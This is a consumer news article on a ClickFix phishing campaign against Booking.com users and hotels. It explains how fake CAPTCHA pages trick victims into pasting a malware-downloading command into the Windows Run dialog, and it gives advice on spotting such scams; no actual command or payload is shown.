Booking.com users are being targeted by yet another phishing campaign designed to steal data, login credentials, and more. Microsoft Threat Intelligence spotted the ongoing attack targeting users and hospitality organizations worldwide, but there are some tell-tale signs.
Yet Another Phishing Campaign Targets Booking.com
Microsoft Threat Intelligencefirst spotted this Booking.com phishing campaign back in December 2024, but it remains active and is claiming victims from numerous countries around the world. The phishing campaign uses a social engineering technique known as ClickFix, which basically tricks users into clicking through error messages to run commands that download malware. Microsoft states:
In the ClickFix technique, a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware
This campaign isn’t very different from your typical phishing attack. The victim receives an email that appears to come from Booking.com, containing a malicious link or a link embedded in a PDF file that supposedly takes the user to the website to resolve the issue.
However, where this campaign does differ is what happens when you click the link. Instead of instantly downloading malware, you’re taken to a CAPTCHA page to “verify” your identity. This CAPTCHA instructs you to open a Windows Run window and then input the command the scammers provide.
The command is automatically copied into your clipboard when the CAPTCHA window appears. while the instructions explain how to press theWindows key + Rshortcut to open the Run window, paste the command using theCtrl + Vshortcut, and finally run it by pressingEnter. Furthermore, this need for user interactions ensures that the malicious payload skirts security features like antivirus programs, firewalls, and other automated security protections.
This command downloads and runs the main malicious payload—malware that can steal financial data and credentials. The payload contains multiple malware families, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
If You’re Unsure, Just Don’t Click
This is far from Booking.com’s first rodeo with phishing scams. TheTelekopye scam targeting Booking.com, also in 2024, caught out thousands of unsuspecting vacationers.
So, before clicking on any links in an email, verify the sender’s email address, as in most cases, the phishing email will not originate from the company’s official address. You can also head straight to the concerned website, in this case, Booking.com, and proceed to resolve your issue there by contacting the company directly.
Cybercriminals using CAPTCHAs to spread malwareisn’t new either. Remember, CAPTCHAs are simple tests to verify if you’re a human. If a CAPTCHA is prompting you to run a command or open any windows, you’re on a malicious website.
